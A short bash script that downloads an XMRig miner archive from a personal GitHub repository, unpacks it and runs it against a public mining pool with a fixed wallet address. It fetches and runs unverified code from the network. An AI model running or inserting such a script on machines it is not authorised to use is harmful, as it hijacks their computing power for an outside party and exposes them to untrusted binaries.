#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o sg.qrl.herominers.com:1166 -u Q010500fdce23760d25e119ea1289943e0047c781cddc67bee3dfd681e0216698699c2f4122bba1 -p id -a rx/0
